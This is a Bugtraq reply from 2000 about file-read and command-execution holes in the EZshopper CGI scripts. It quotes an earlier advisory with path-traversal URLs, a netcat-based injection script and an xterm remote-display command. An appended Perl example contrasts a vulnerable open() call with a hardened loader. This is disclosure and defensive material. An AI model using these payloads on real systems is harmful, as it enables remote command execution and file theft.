[18142] in bugtraq
Re: NSFOCUS SA2000-09 : AHG EZshopper Loadpage.cgi File
daemon@ATHENA.MIT.EDU (Marshal)
Mon Dec 18 19:31:36 2000
Message-Id: <3A3B3FCC.8946D71D@marshal-soft.com>
Date: Sat, 16 Dec 2000 11:11:24 +0100
Reply-To: Marshal <marshal@MARSHAL-SOFT.COM>
From: Marshal <marshal@MARSHAL-SOFT.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
I also contacted AHG about it a long time ago; it seems that they had an
update.
This update is still vuln: with loadpage it is possible to view any file above
the specified $root= dir in the config file, but execution and viewing files
with search is no longer possible.
I contacted them about it; they did nothing.
But yes, this advisory is old news.
suid@SNEAKERZ.ORG wrote:
>
> Uhh... guys, I don't really mean to dis you but...
> It sometimes pays to research a bit before releasing advisories.
> Here is something I posted (to bugtraq no less) on the 28th of Feb this year.
>
> k thx bye
>
> suid@suid.kg - EZ Shopper 3.0 remote command execution.
>
> Software: EZ Shopper 3.0
> URL: http://www.ahg.com/software.htm#ezshopper
> Version: Version 3.0
> Platforms: Unix, NT
> Type: CGI, Input validation problem
> Vendor status: Notified 26/02/2000
> Date: 26/02/2000
>
> Summary:
>
> Anyone can execute any command on the remote system with
> the privileges of the web server. Anyone can read any file
> on the remote system which the webserver has access to.
>
> Vulnerability:
>
> The perl code does no input validation and performs an
> open() on a user supplied input.
>
> Exploit:
>
> (1) loadpage.cgi - view any file.
>
> Firstly using your web browser find the current path (cwd):
>
> http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=XYZ
>
> You will receive an error message like:
>
> Cannot open file /home/www/shop/XYZ
>
> Now simply use (example based on the above cwd):
>
> http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=../../<path>/<file>
>
> (2) loadpage.cgi - execute any command.
>
> This example shell script uses netcat to communicate with a
> HTTP proxy and exploit the script:
>
> ------------------------CUT------------------------
>
> #!/bin/bash
> echo -e "GET http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=|"$1"| HTTP/1.0\n\n" | nc proxy.server.com 8080
>
> ------------------------CUT------------------------
>
> A usage example would be:
>
> $ ./ezhack.sh /usr/X11R6/bin/xterm%20-display%20123.123.123.123:0
>
> (3) search.cgi - view files (retarded tho) and execute commands.
>
> Simply replace the database field with piped commands or path/filename.
>
> http://www.example.com/cgi-bin/search.cgi?user_id=1&database=<insert here>&template=<or insert here>&distinct=1
>
> Note if you use the database field a valid template is probably needed
> and vice versa.
>
> Workaround:
>
> The vendor, AHG Inc, has released a fixed version, download it from
> their website and install the fixed version.
--
Groeten,
Marshal
[ url : http://www.startplaza.nu | security news & links ]
[ url : http://www.heknet.com | security news & exploits ]
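An added example, not EZshopper's code and not from either poster: the Perl two-argument open() pattern the advisory describes ("performs an open() on a user supplied input"), with a hardened loader beside it. The $root value and the sample file names are assumed; $root mirrors the path in the advisory's error message.

```perl
#!/usr/bin/perl
# Added example (not EZshopper's code): the loadpage.cgi bug class from the
# advisory beside a hardened version. $root is assumed.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;

my $root = '/home/www/shop';

# Vulnerable pattern. In two-argument open() the string is mode + name:
# "../" walks out of $root, and a trailing '|' (file=|cmd|) turns the whole
# string into a shell pipeline, so a file name becomes command execution.
sub load_page_vulnerable {
    my ($file) = @_;
    open(my $fh, "$root/$file") or return undef;    # do not use
    local $/;
    return <$fh>;
}

# Hardened version: three-argument open() with an explicit '<' mode treats
# the name purely as a path; a whitelist rejects '/', '|' and NUL; and
# realpath() containment rejects '..' and symlinks that lead out of $root.
sub load_page_safe {
    my ($file) = @_;
    return (undef, 'bad name') unless defined $file && $file =~ /\A[\w.-]+\z/;
    my $real_root = realpath($root);
    return (undef, 'no root') unless defined $real_root;
    my $path = realpath(File::Spec->catfile($real_root, $file));
    return (undef, 'not found') unless defined $path;
    return (undef, 'outside root') unless index($path, "$real_root/") == 0;
    open(my $fh, '<', $path) or return (undef, "cannot open: $!");
    local $/;
    my $data = <$fh>;
    close $fh;
    return ($data, undef);
}

# Constructed inputs: the advisory's traversal and pipe payloads are
# rejected before any open() is attempted.
for my $name ('index.html', '../../etc/passwd', '|id|') {
    my ($data, $err) = load_page_safe($name);
    printf "%-18s => %s\n", $name, defined $data ? 'served' : "rejected ($err)";
}
```

With $root absent on the machine running it, every name is rejected at the whitelist or realpath step; point $root at a real directory to see a page served.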